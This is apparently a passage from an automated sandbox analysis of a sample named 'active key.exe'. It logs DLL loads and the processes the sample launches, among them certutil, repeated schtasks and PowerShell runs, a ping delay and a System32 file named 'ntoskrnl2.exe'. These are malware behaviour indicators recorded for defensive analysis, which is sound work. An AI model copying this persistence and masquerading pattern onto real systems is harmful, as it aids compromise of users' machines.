                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "md5" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "certutil"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\active key.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                    Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: certca.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
